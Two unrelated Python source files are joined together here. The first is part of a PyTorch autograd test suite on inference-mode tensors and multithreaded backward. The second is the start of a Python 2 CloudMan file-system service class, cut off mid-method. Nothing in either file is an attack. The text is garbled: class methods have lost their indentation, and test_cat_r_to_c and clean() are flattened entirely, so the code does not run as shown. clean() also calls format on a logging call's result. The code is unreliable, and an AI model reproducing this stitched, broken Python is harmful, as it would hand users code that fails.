    normal tensors, so a prior saved-for-backward detects the mutation."""
    s = torch.ones(1, 2, 3, requires_grad=True)
    a = s.clone()

    # `a` gets saved outside of inference mode
    out = a * a
    with torch.inference_mode():
        a.add_(2)

    self.assertFalse(torch.is_inference(a))
    # tensors created outside of inference mode aren't
    # inference tensors, so they will still have their
    # version counters tracked
    err_msg = ("one of the variables needed for gradient computation has been "
               "modified by an inplace operation")
    with self.assertRaisesRegex(RuntimeError, err_msg):
        out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
    """Functional ops on inference tensors inside inference mode produce
    inference tensors that do not require grad."""
    def functional_op(x):
        return x * x

    with torch.inference_mode():
        for requires_grad in (True, False):
            c = torch.ones(1, 2, 3, requires_grad=requires_grad)

            # performing a non-view operation produces a inference tensor
            # that does not require grad
            func_out = functional_op(c)
            self.assertTrue(torch.is_inference(func_out))
            self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
    """In-place ops inside inference mode keep the tensor an inference
    tensor and preserve requires_grad."""
    @torch.inference_mode()
    def run_test(fn):
        for requires_grad in (True, False):
            c = torch.ones(1, 2, 3, requires_grad=requires_grad)

            # after performing inplace operation, tensor is still
            # an inference tensor
            fn(c)
            self.assertTrue(torch.is_inference(c))
            self.assertEqual(c.requires_grad, requires_grad)
    run_test(lambda x: x.add_(2))
    run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
    """Views of inference tensors taken inside inference mode are inference
    tensors that do not require grad."""
    with torch.inference_mode():
        for requires_grad in (True, False):
            c = torch.ones(1, 2, 3, requires_grad=requires_grad)

            # perform view operation produces inference tensor
            # that does not require grad
            view_out = c.view(-1)
            self.assertTrue(torch.is_inference(view_out))
            self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
    """Outside inference mode, functional ops on inference tensors yield
    normal leaf tensors that do not require grad."""
    def functional_op(x):
        return x * x

    for requires_grad in (True, False):
        with torch.inference_mode():
            c = torch.ones(1, 2, 3, requires_grad=requires_grad)

        func_out = functional_op(c)
        self.assertFalse(torch.is_inference(func_out))
        self.assertFalse(func_out.requires_grad)
        self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
    """In-place updates to inference tensors outside inference mode raise
    (the requires_grad=True case is skipped here)."""
    def run_test(fn):
        for requires_grad in (False, True):
            with torch.inference_mode():
                c = torch.ones(1, 2, 3, requires_grad=requires_grad)

            if requires_grad:
                # leaf variable that requires grad is being used in an inplace
                # operation when requires_grad=True
                pass
            else:
                err_msg = "Inplace update to inference tensor outside InferenceMode"
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    fn(c)
    run_test(lambda x: x.add_(2))
    run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
    """Views of inference tensors taken outside inference mode remain
    inference tensors and are not tracked as views."""
    for requires_grad in (True, False):
        with torch.inference_mode():
            c = torch.ones(1, 2, 3, requires_grad=requires_grad)

        out = c.view(-1)
        self.assertTrue(torch.is_inference(out))
        self.assertFalse(out.requires_grad)
        self.assertFalse(out._is_view())
        self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
    """In-place ops on a normal tensor inside inference mode keep it a
    normal tensor, through chained in-place ops and a subsequent view."""
    def run_test(fn):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)
            a = s.clone()

            with torch.inference_mode():
                fn(a)
                self.assertFalse(torch.is_inference(a))
                self.assertEqual(a.requires_grad, requires_grad)

                # inplace -> inplace
                fn(a)
                self.assertFalse(torch.is_inference(a))
                self.assertEqual(a.requires_grad, requires_grad)

                # inplace -> inplace -> view
                view_out = a.view(-1)
                self.assertFalse(torch.is_inference(view_out))
                self.assertEqual(view_out.requires_grad, requires_grad)
    run_test(lambda x: x.add_(2))
    run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
    """A normal tensor modified in place inside inference mode stays normal
    when further modified/viewed after exiting inference mode."""
    def run_test(fn):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)
            a = s.clone()

            with torch.inference_mode():
                fn(a)
                self.assertFalse(torch.is_inference(a))
                self.assertEqual(a.requires_grad, requires_grad)

            fn(a)
            self.assertFalse(torch.is_inference(a))
            self.assertEqual(a.requires_grad, requires_grad)

            # inplace -> inplace
            fn(a)
            self.assertFalse(torch.is_inference(a))
            self.assertEqual(a.requires_grad, requires_grad)

            # inplace -> inplace -> view
            view_out = a.view(-1)
            self.assertFalse(torch.is_inference(view_out))
            self.assertEqual(view_out.requires_grad, requires_grad)
    run_test(lambda x: x.add_(2))
    run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
    """Views of normal tensors taken inside inference mode remain normal,
    chain correctly, and share version counters with the base."""
    for requires_grad in (True, False):
        s = torch.ones(1, 2, 3, requires_grad=requires_grad)
        a = s.clone()

        with torch.inference_mode():
            out = a.view(-1)
            self.assertFalse(torch.is_inference(out))
            self.assertEqual(out.requires_grad, requires_grad)
            self.assertTrue(out._is_view())

            # view -> view
            tmp = out.view(-1)
            self.assertFalse(torch.is_inference(tmp))
            self.assertEqual(tmp.requires_grad, requires_grad)
            self.assertTrue(tmp._is_view())
            self.assertTrue(tmp.is_leaf)

            # view -> view -> inplace
            self.assertTrue(torch.is_inference_mode_enabled())
            tmp.add_(2)
            self.assertFalse(torch.is_inference(tmp))
            self.assertEqual(tmp.requires_grad, requires_grad)
            # Accessing is_leaf in python tries to update grad_fn and raises:
            # A view was created in inference mode and its base or
            # another view of its base has been modified inplace in normal mode
            # tmp.is_leaf
            self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
    """A view created inside inference mode can be used functionally outside
    it, but in-place modification raises if grad is required."""
    def functional_op(x):
        return x * x

    for requires_grad in (True, False):
        s = torch.ones(1, 2, 3, requires_grad=requires_grad)
        a = s.clone()

        with torch.inference_mode():
            out = a.view(-1)
            self.assertFalse(torch.is_inference(out))
            self.assertEqual(out.requires_grad, requires_grad)
            self.assertTrue(out._is_view())
            self.assertTrue(out.is_leaf)

        tmp = functional_op(out)
        self.assertFalse(torch.is_inference(tmp))
        self.assertEqual(tmp.requires_grad, requires_grad)

        if requires_grad:
            err_msg = "A view was created in inference mode and is being modified inplace"
            with self.assertRaisesRegex(RuntimeError, err_msg):
                out.add_(2)
            pass
        else:
            out.add_(2)

        tmp = out.view(2, 3)
        self.assertFalse(torch.is_inference(tmp))
        self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
    """Mixing an inference tensor with a normal tensor in a functional op
    is allowed only when the op saves nothing for backward; ops that would
    save an inference tensor must raise."""
    for requires_grad in (True, False):
        s = torch.ones(1, 2, 3, requires_grad=requires_grad)

        with torch.inference_mode():
            c = torch.ones(1, 2, 3, requires_grad=requires_grad)

        # add is safe since it doesn't save any variable for backward
        out = c.add(s)
        self.assertFalse(torch.is_inference(out))
        self.assertEqual(out.requires_grad, requires_grad)

        if requires_grad:
            # leaf inference tensor with requires_grad=True can still have gradient
            out.backward(torch.ones_like(out))
            self.assertEqual(c.grad, torch.ones_like(c))

        if requires_grad:
            # mul saves both operands for backward, so it must reject c.
            err_msg = "Inference tensors cannot be saved for backward"
            with self.assertRaisesRegex(RuntimeError, err_msg):
                c * s

            # inference tensor in TensorList input
            inputs = [s, c]
            with self.assertRaisesRegex(RuntimeError, err_msg):
                torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
    """In-place and out= ops mixing inference and normal tensors: raising
    behavior depends on whether the normal tensor requires grad."""
    for requires_grad in (True, False):
        s = torch.ones(1, 2, 3, requires_grad=requires_grad)
        a = s.clone()

        with torch.inference_mode():
            c = torch.ones(1, 2, 3)

        self.assertTrue(torch.is_inference(c))
        if requires_grad:
            err_msg = "Inference tensors cannot be saved for backward"
            with self.assertRaisesRegex(RuntimeError, err_msg):
                a.mul_(c)

            # inference tensor in TensorList input
            err_msg = ("out=... arguments don't support automatic differentiation, "
                       "but one of the arguments requires grad")
            with self.assertRaisesRegex(RuntimeError, err_msg):
                torch.mul(s, s, out=c)
        else:
            # Nothing requires grad, so in-place with an inference operand is fine...
            a.mul_(c)
            # ...but writing INTO an inference tensor outside inference mode is not.
            err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
            with self.assertRaisesRegex(RuntimeError, err_msg):
                torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
    """View ops never receive mixed inference/normal tensor inputs, so
    view_as works in both directions; the output inherits inference-ness
    from the tensor being viewed."""
    for requires_grad in (True, False):
        s = torch.ones(1, 2, 3, requires_grad=requires_grad)

        with torch.inference_mode():
            c = torch.ones(1, 2, 3)

        # view_as is a composite op which calls view with only one
        # tensor argument. So there isn't a mixed inference and normal
        # tensor inputs for view ops
        tmp1 = c.view_as(s)
        self.assertTrue(torch.is_inference(tmp1))
        self.assertFalse(tmp1.requires_grad)

        # this is fine since its equivalent as s.view(c.sizes()) which
        # isn't a mixed input scenario
        tmp2 = s.view_as(c)
        self.assertFalse(torch.is_inference(tmp2))
        self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
    """Directly mutating (in normal mode) a view that was created inside
    inference mode must raise when the base requires grad."""
    def run_test(fn):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)
            a = s.clone()

            with torch.inference_mode():
                view_out = a.view_as(a)

            if requires_grad:
                err_msg = "A view was created in inference mode and is being modified inplace"
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    fn(view_out)
                pass
            else:
                fn(view_out)
    run_test(lambda x: x.add_(2))
    run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
    """Mutating the BASE (in normal mode) of a view created inside
    inference mode: accessing the view's grad_fn afterwards must raise
    when the base requires grad."""
    def run_test(fn):
        for requires_grad in (True, False):
            s = torch.ones(1, 2, 3, requires_grad=requires_grad)
            a = s.clone()

            with torch.inference_mode():
                view_out = a.view(-1)

            # Mutate the base, not the view.
            fn(a)
            if requires_grad:
                err_msg = "A view was created in inference mode and its base or another view "
                with self.assertRaisesRegex(RuntimeError, err_msg):
                    view_out.grad_fn
                pass
            else:
                view_out.grad_fn
    run_test(lambda x: x.add_(2))
    run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
    def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
        """Run ``fn(*args, **kwargs)`` concurrently on ``num_threads`` Python
        threads, re-raising (on join) any exception raised in a child thread.

        BUG FIX: ``kwargs`` was previously accepted but never forwarded to the
        threads; it is now passed through to ``threading.Thread``.
        """
        class PropagatingThread(threading.Thread):
            '''Helper class to propagate exception from child
            thread to main thread on join.

            Reference: https://stackoverflow.com/a/31614591/5602957
            '''

            def run(self):
                self.exception = None
                try:
                    self.ret = super(PropagatingThread, self).run()
                except Exception as e:
                    # Stash the exception; it is re-raised in join() so the
                    # main thread (and the test runner) sees the failure.
                    self.exception = e

            def join(self, timeout=None):
                super(PropagatingThread, self).join(timeout)
                if self.exception:
                    raise self.exception from self.exception
                return self.ret

        threads = []
        for _ in range(num_threads):
            p = PropagatingThread(target=fn, args=args, kwargs=kwargs or {})
            p.start()
            threads.append(p)

        for p in threads:
            p.join()
def test_multithreaded_exception_propagation(self):
    # Test whether exceptions raised in a child thread
    # are propagated to the main thread (via PropagatingThread.join).
    def fn():
        self.assertTrue(False)

    with self.assertRaises(AssertionError):
        self._run_py_multithread_fn(fn)
def test_simple_backward(self):
    # simple multithreaded backward that create threads in the beginning of training
    # and everything else is training separately, i.e. inputs, operations, etc.
    def train_fn():
        x = torch.ones(5, 5, requires_grad=True)
        y = (x + 3) * (x + 4) * 0.5
        y.sum().backward()
        # d/dx[0.5*(x+3)(x+4)] = 0.5*(2x+7) = x + 3.5
        self.assertEqual(x.grad, x + 3.5)

    self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
    # simple multithreaded backward with only shared inputs (i.e. This is common
    # for things like Hogwild multithreaded training with multiple CPU threads)
    def train_fn_backward(x):
        y = (x + 3) * (x + 4) * 0.5
        y.sum().backward()

    x = torch.ones(5, 5, requires_grad=True)
    self._run_py_multithread_fn(train_fn_backward, (x,))
    # Since we are calling backward from multiple threads
    # and all threads share the same input, when we do backward
    # concurrently, different backwards will all accumulate to
    # the same .grad for each input, and the gradients should
    # be equal to num_threads * gradient
    self.assertEqual(x.grad, 10 * (x + 3.5))

    def train_fn_grad(x):
        y = (x + 3) * (x + 4) * 0.5
        grads = torch.autograd.grad(y.sum(), x)
        self.assertEqual(len(grads), 1)
        self.assertEqual(grads[0], x + 3.5)

    # since we use functional grad() api, gradients will not
    # be accumulate to the same place and should be the same
    self._run_py_multithread_fn(train_fn_grad, (x,))
def test_multithread_saved_tensors_hooks(self):
    """Saved-tensors hooks are thread-local: each thread registering its own
    hooks should observe exactly its own pack warnings."""
    def pack(x):
        warnings.warn("pack")
        return x

    def registers_hooks_for_each_thread():
        with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
            x = torch.ones(5, 5, requires_grad=True)
            with warnings.catch_warnings(record=True) as w:
                y = x * x
                # should raise two warnings from x being saved twice
                self.assertEqual(len(w), 2)
            y.sum().backward()

    # BUG FIX: the helper above was defined but never executed, so this
    # test previously asserted nothing. Run it on multiple threads.
    self._run_py_multithread_fn(registers_hooks_for_each_thread)
def test_dataparallel_saved_tensors_hooks(self):
    """Saved-tensors hooks are NOT propagated into DataParallel's worker
    threads (thread-local state), so hook warnings only fire when the
    forward runs on the registering thread."""
    def pack(x):
        warnings.warn("pack")
        return x

    # Capture the test instance; `self` inside Model.forward is the module.
    _self = self

    class Model(torch.nn.Module):
        def forward(self, x):
            with warnings.catch_warnings(record=True) as w:
                y = x * x
                if torch.cuda.device_count() >= 2:
                    # DataParallel is calling the forward in different threads
                    # without propagating TLS, so hooks should not be called here
                    _self.assertEqual(len(w), 0)
                else:
                    # DataParallel only uses one thread
                    # so hooks should be called here
                    _self.assertGreater(len(w), 0)

    x = torch.ones(5, 5, requires_grad=True)
    model = torch.nn.DataParallel(Model())

    with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
        model(x)
        with warnings.catch_warnings(record=True) as w:
            y = x * x
            # hooks should be called here
            _self.assertGreater(len(w), 0)
def test_python_thread_in_middle(self):
    # User might write a network that starts on one CPU thread, then runs its second half
    # concurrently with other threads (either via python threading or fork/join calls),
    # then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
    # bottom to output at the top. This way part of the GraphTask is being shared across
    # different threads and we need to ensure user specify retain_graph=True, otherwise
    # error out with the correct error message

    # Case 1: multiple backward with python threads, retain_graph=False
    # should throw error in some threads with no retain_graph.
    success_vs_raises = [0, 0]

    def train_fn_no_retain_graph(x):
        y = x + x ** 2
        try:
            y.sum().backward()
            success_vs_raises[0] += 1
        except RuntimeError as error:
            success_vs_raises[1] += 1
            self.assertRegex(str(error), "Specify retain_graph=True")

    x_no_retain = torch.ones(5, 5, requires_grad=True)
    y_no_retain = x_no_retain + x_no_retain ** 2
    self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
    # at least one thread will be success in this case, all other threads should raise
    # with the error that throw to user to recommend them specify retain_graph=True
    self.assertTrue(success_vs_raises[0] >= 1)

    # multiple backward with python threads, no error with retain_graph=True
    def train_fn_retain_graph(x):
        y = x + x ** 2
        y.sum().backward(retain_graph=True)

    x_retain = torch.ones(5, 5, requires_grad=True)
    y_retain = x_retain + x_retain ** 2
    self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
    # result should equal to num_thread * gradients
    self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
    # multiple backward with jit threads (fork/join primitive)
    # similar to test_python_thread_in_middle, we test with retain_graph=False/True

    # Case 1: multiple grad() calls with jit threads, retain_graph=False
    # should throw error in some threads with no retain_graph.
    @torch.jit.script
    def train_fn_jit_no_retain(middle, orig_x):
        y = middle + middle ** 2
        return torch.autograd.grad([y.sum()], [orig_x])

    @torch.jit.script
    def train_fn_fork_join_calls_no_retain(x):
        y_no_retain = (x + 3) * (x + 4) * 0.5

        # Two concurrent grad() calls over the same graph segment.
        fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
        grad_hat = train_fn_jit_no_retain(y_no_retain, x)
        grad = torch.jit._wait(fut)
        return grad, grad_hat

    try:
        train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
    except RuntimeError as error:
        self.assertRegex(str(error), "Specify retain_graph=True")

    # Case 2: no error with retain_graph=True
    @torch.jit.script
    def train_fn_jit_retain(middle, orig_x):
        y = middle + middle ** 2
        return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)

    @torch.jit.script
    def train_fn_fork_join_calls_retain(x):
        y_retain = (x + 3) * (x + 4) * 0.5
        fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
        fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
        grad = train_fn_jit_retain(y_retain, x)
        grad1 = torch.jit._wait(fut1)
        grad2 = torch.jit._wait(fut2)
        return grad, grad1, grad2

    grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
    # All three concurrent grad() calls must agree.
    self.assertEqual(grad, grad1)
    self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
    """An exception raised inside a custom Function's backward must keep
    the original Python traceback (including the raising line)."""
    class Foo(torch.autograd.Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        def backward(ctx, *grad):
            raise ValueError("something")

    t = torch.rand(10, requires_grad=True)
    try:
        Foo.apply(t).sum().backward()
    except Exception:
        import traceback
        tb = sys.exc_info()[2]
        tb_str = "\n".join(traceback.format_tb(tb))
        # The user-level raising line must appear in the formatted traceback.
        self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Import test cases from below autograd/ here. These are found
# implicitly by the loader, so Flake8 thinks they are unused, hence
# the suppressions.
from autograd.test_complex import TestAutogradComplex  # noqa: F401

# Generate per-device variants of the device-generic test class,
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
    TestAutogradDeviceType,
    globals(),
    except_for=None
)

# Expand @parametrize-d tests into individual test methods.
instantiate_parametrized_tests(TestAutograd)

if __name__ == '__main__':
    run_tests()
|
filesystem.py | """
A core class for what CloudMan sees as a file system. This means that it is
aware of it and can thus manipulate it.
"""
import os
import shutil
import commands
import threading
from datetime import datetime
from boto.exception import EC2ResponseError
from cm.util import misc
from cm.util.misc import run
from cm.util.misc import flock
from cm.util.misc import nice_size
from cm.services import service_states
from cm.services import ServiceRole
from cm.services.data import DataService
from cm.services.data.mountablefs import MountableFS
from cm.services.data.volume import Volume
from cm.services.data.bucket import Bucket
from cm.services.data.transient_storage import TransientStorage
import logging
log = logging.getLogger('cloudman')
class Filesystem(DataService):
    """A CloudMan file system service: a single mount point that may be
    backed by volumes, buckets, transient storage, NFS, or Gluster."""

    def __init__(self, app, name, svc_roles=None, mount_point=None, persistent=True):
        """Create a file system service named ``name``.

        ``svc_roles`` defaults to ``[ServiceRole.GENERIC_FS]``; ``mount_point``
        defaults to ``<mount_root>/<name>``; ``persistent`` controls whether
        the FS is part of the saved cluster configuration.
        """
        super(Filesystem, self).__init__(app)
        # BUG FIX: avoid a mutable default argument ([ServiceRole.GENERIC_FS]);
        # the list is stored on the instance and a shared default could leak
        # mutations across Filesystem objects.
        if svc_roles is None:
            svc_roles = [ServiceRole.GENERIC_FS]
        log.debug("Instantiating Filesystem object {0} with service roles: {1}".format(
            name, ServiceRole.to_string(svc_roles)))
        self.svc_roles = svc_roles
        self.nfs_lock_file = '/tmp/nfs.lockfile'
        # TODO: Introduce a new file system layer that abstracts/consolidates
        # potentially multiple devices under a single file system interface
        # Maybe a class above this class should be introduced, e.g., DataService,
        # that provides the common interface???
        self.volumes = []  # A list of cm.services.data.volume.Volume objects
        self.buckets = []  # A list of cm.services.data.bucket.Bucket objects
        self.transient_storage = []  # Instance's transient storage
        self.nfs_fs = None  # NFS file system object implementing this file system's device
        self.gluster_fs = None  # GlusterFs based file system object implementing this file system's device
        self.name = name  # File system name
        self.persistent = persistent  # Whether it should be part of the cluster config
        self.size = None  # Total size of this file system
        self.size_used = None  # Used size of the this file system
        self.size_pct = None  # Used percentage of this file system
        self.dirty = False  # Whether the NFS server needs a restart
        self.kind = None  # Choice of 'snapshot', 'volume', 'bucket', 'transient', or 'nfs'
        self.mount_point = mount_point if mount_point is not None else os.path.join(
            self.app.path_resolver.mount_root, self.name)
        self.grow = None  # Used (APPLICABLE ONLY FOR the galaxyData FS) to indicate a need to grow
        # the file system; use following dict structure:
        # {'new_size': <size>, 'snap_desc': <snapshot description>}
        self.started_starting = datetime.utcnow()  # A time stamp when the state changed to
        # STARTING; it is used to avoid brief ERROR
        # states during the system configuration.
def __repr__(self):
    # Delegate to get_full_name() so repr() and the descriptive name agree.
    return self.get_full_name()
def get_full_name(self):
    """Compose and return a short, human-readable identifier for this FS."""
    descriptive_name = "FS object for {0}".format(self.name)
    return descriptive_name
def get_details(self):
    """
    Return a dictionary describing this file system, merging the generic
    FS details with details from every underlying device (volumes,
    buckets, transient storage, NFS, Gluster).
    """
    details = {}
    details = self._get_details(details)
    # Uff... This is not scalable and, depending on the context, questionably
    # functionally correct... (later devices overwrite keys set by earlier ones)
    for vol in self.volumes:
        details = vol._get_details(details)
    for b in self.buckets:
        details = b._get_details(details)
    for ts in self.transient_storage:
        details = ts._get_details(details)
    if self.kind == 'nfs':
        details = self.nfs_fs._get_details(details)
    if self.kind == 'gluster':
        details = self.gluster_fs._get_details(details)
    return details
def _get_details(self, details):
    """
    Populate ``details`` with the device-independent properties of this
    file system and return it.
    """
    details.update({
        'name': self.name,
        'kind': str(self.kind).title(),
        'size': nice_size(self.size),
        'size_used': nice_size(self.size_used),
        'size_pct': self.size_pct,
        'status': self.state,
        'err_msg': "",
        'mount_point': self.mount_point,
        'persistent': "Yes" if self.persistent else "No",
    })
    return details
def add(self):
    """
    Add this file system service by adding any devices that compose it.
    Returns ``True`` on success, ``False`` if the service is not in a
    startable state or a device failed to add.
    """
    # Only an unstarted or previously shut down service may be (re)added.
    if self.state == service_states.UNSTARTED or self.state == service_states.SHUT_DOWN:
        try:
            log.debug("Trying to add file system service named '{0}'"
                      .format(self.get_full_name()))
            self.state = service_states.STARTING
            self.started_starting = datetime.utcnow()
            # `activated` is presumably inherited from DataService — TODO confirm.
            if not self.activated:
                self.activated = True
                log.debug("Service {0} self-activated".format(self.get_full_name()))
            # TODO: devices must be added to a file system before one can
            # be `added` and thus we know what `kind` a FS is. So, instead of
            # iterating over all devices, just use `self.kind`-based if/else, right?
            # See `nfs` case as an example
            for vol in self.volumes:
                # Threading has some issues w/ race conditions over device IDs
                # threading.Thread(target=vol.add).start()
                vol.add()
            for b in self.buckets:
                self.kind = 'bucket'
                # Bucket mounting is slow, so do it on a background thread.
                threading.Thread(target=b.mount).start()
                log.debug("Initiated addition of FS from bucket {0}".format(
                    b.bucket_name))
            for ts in self.transient_storage:
                self.kind = 'transient'
                ts.add()
            if self.kind == 'nfs':
                self.nfs_fs.start()
            elif self.kind == 'gluster':
                self.gluster_fs.start()
        except Exception, e:
            log.error("Error adding file system service {0}: {1}".format(
                self.get_full_name(), e))
            return False
        # Refresh state now that all devices were kicked off.
        self.status()
        log.debug("Done adding devices to {0} (devices: {1}, {2}, {3}, {4}, {5})"
                  .format(self.get_full_name(), self.volumes, self.buckets,
                          self.transient_storage, self.nfs_fs.device if self.nfs_fs else '-',
                          self.gluster_fs.device if self.gluster_fs else '-'))
        return True
    else:
        log.debug("Data service {0} in {2} state instead of {1} state; cannot add it"
                  .format(self.get_full_name(), service_states.UNSTARTED, self.state))
        return False
def remove(self, synchronous=False, delete_devices=False):
    """
    Initiate removal of this file system from the system. The removal
    itself happens on a worker thread, so this method returns without
    waiting unless ``synchronous`` is set. If ``delete_devices`` is set,
    all devices composing this file system are deleted during removal.

    .. warning::

        Setting ``delete_devices`` is irreversible. All data will be
        permanently deleted.
    """
    log.info("Initiating removal of '{0}' data service with: volumes {1}, buckets {2}, "
             "transient storage {3}, nfs server {4} and gluster fs {5}".format(self.get_full_name(),
             self.volumes, self.buckets, self.transient_storage, self.nfs_fs, self.gluster_fs))
    self.state = service_states.SHUTTING_DOWN
    removal_kwargs = {'delete_devices': delete_devices}
    removal_thread = threading.Thread(target=self.__remove, kwargs=removal_kwargs)
    removal_thread.start()
    if synchronous:
        removal_thread.join()
def __remove(self, delete_devices=False, remove_from_master=True, detach=True):
    """
    Do the actual removal of devices used to compose this file system.

    Setting ``delete_devices`` will instruct the underlying service to delete
    any of its devices. **Warning**: all data on those devices will be
    permanently deleted. *Note* that for the time being, ``delete_devices`` is
    only propagated to the ``volume`` service/devices.

    After the service is successfully stopped, if ``remove_from_master``
    is set to ``True``, the service is automatically removed
    from the list of services monitored by the master.

    ``detach`` applies to volume-based file systems only and, if set, the
    given volume will be detached in the process of removing the file system.
    Otherwise, it will be left attached (this is useful during snapshot creation).
    """
    # Let the base class do its own teardown first (blocking).
    super(Filesystem, self).remove(synchronous=True)
    log.debug("Removing {0} devices".format(self.get_full_name()))
    self.state = service_states.SHUTTING_DOWN
    for vol in self.volumes:
        vol.remove(self.mount_point, delete_vols=delete_devices, detach=detach)
    for b in self.buckets:
        b.unmount()
    for t in self.transient_storage:
        t.remove()
    if self.nfs_fs:
        self.nfs_fs.stop()
    elif self.gluster_fs:
        self.gluster_fs.stop()
    log.debug("Setting state of %s to '%s'" % (
        self.get_full_name(), service_states.SHUT_DOWN))
    self.state = service_states.SHUT_DOWN
    # Remove self from the list of master's services
    if self.state == service_states.SHUT_DOWN and remove_from_master:
        self.app.manager.deactivate_master_service(self)
def clean(self):
"""
Remove this file system and clean up the system as if the file system was
never there. Useful for CloudMan restarts.
"""
self.__remove(delete_devices=True)
# If the service was successfuly removed, remove the mount point
if self.state == service_states.SHUT_DOWN:
try:
if len(os.listdir(self.mount_point)) > 0:
shutil.rmtree(self.mount_point)
except OSError, e:
log.error("Trouble cleaning directory '%s': %s" %
(self.mount_point, e))
else:
log.warning("Wanted to clean file system {0} but the service is not in state '{1}'; "
"it in state '{2}'").format(self.name, service_states.SHUT_DOWN, self.state)
def expand(self):
    """
    Expand the size of this file system. Note that this process requires
    the file system to be unmounted during the operation and the new one
    will be automatically remounted upon completion of the process.
    Also note that this method applies only to Volume-based file systems.
    Returns ``True`` on success, ``False`` otherwise.
    """
    if self.grow is not None:
        # Detach devices but keep them and keep the service registered.
        self.__remove(delete_devices=False, remove_from_master=False)
        self.state = service_states.CONFIGURING
        smaller_vol_ids = []
        # Create a snapshot of the detached volume
        for vol in self.volumes:
            smaller_vol_ids.append(vol.volume_id)
            # NOTE(review): key 'snap_description' is used here, but the
            # comment in __init__ documents the grow dict key as
            # 'snap_desc' — confirm which one callers actually set.
            snap_id = vol.create_snapshot(self.grow['snap_description'])
            # Reset the reference to the cloud volume resource object
            vol.volume = None
            # Set the size for the new volume
            vol.size = self.grow['new_size']
            # Set the snapshot from which a new volume resource object will
            # be created
            vol.from_snapshot_id = snap_id
        # Create a new volume based on just created snapshot and add the
        # file system
        self.state = service_states.SHUT_DOWN  # So it gets started again w/o monitor
        # adding it as a new service;
        # TOOD: define a set of stats for
        # file system services
        self.add()
        # Grow the file system
        if not run('/usr/sbin/xfs_growfs %s' % self.mount_point, "Error growing file system '%s'"
                   % self.mount_point, "Successfully grew file system '%s'" % self.mount_point):
            return False
        # Delete old, smaller volumes since everything seems to have gone ok
        ec2_conn = self.app.cloud_interface.get_ec2_connection()
        for smaller_vol_id in smaller_vol_ids:
            try:
                ec2_conn.delete_volume(smaller_vol_id)
                log.debug("Deleted smaller volume {0} after resizing".format(
                    smaller_vol_id))
            except EC2ResponseError, e:
                log.error("Error deleting smaller volume '%s' after resizing: %s"
                          % (smaller_vol_id, e))
        # If specified by user, delete the snapshot used during the
        # resizing process. NOTE(review): `snap_id` refers to the LAST
        # volume's snapshot only — multi-volume FSs would leak snapshots.
        if self.grow['delete_snap'] is True:
            try:
                ec2_conn.delete_snapshot(snap_id)
                log.debug("Deleted temporary snapshot {0} created and used during resizing"
                          .format(snap_id))
            except EC2ResponseError, e:
                log.error("Error deleting snapshot '%s' during '%s' resizing: %s"
                          % (snap_id, self.get_full_name(), e))
        self.grow = None  # Reset flag
        return True
    else:
        log.debug("Tried to grow '%s' but grow flag is None" %
                  self.get_full_name())
        return False
def create_snapshot(self, snap_description=None):
    """
    Create a snapshot of this file system and return the list of new
    snapshot IDs.

    .. note::
        This functionality applies only to file systems based on volumes.
    """
    detach = True
    if self.app.cloud_type == "ec2":
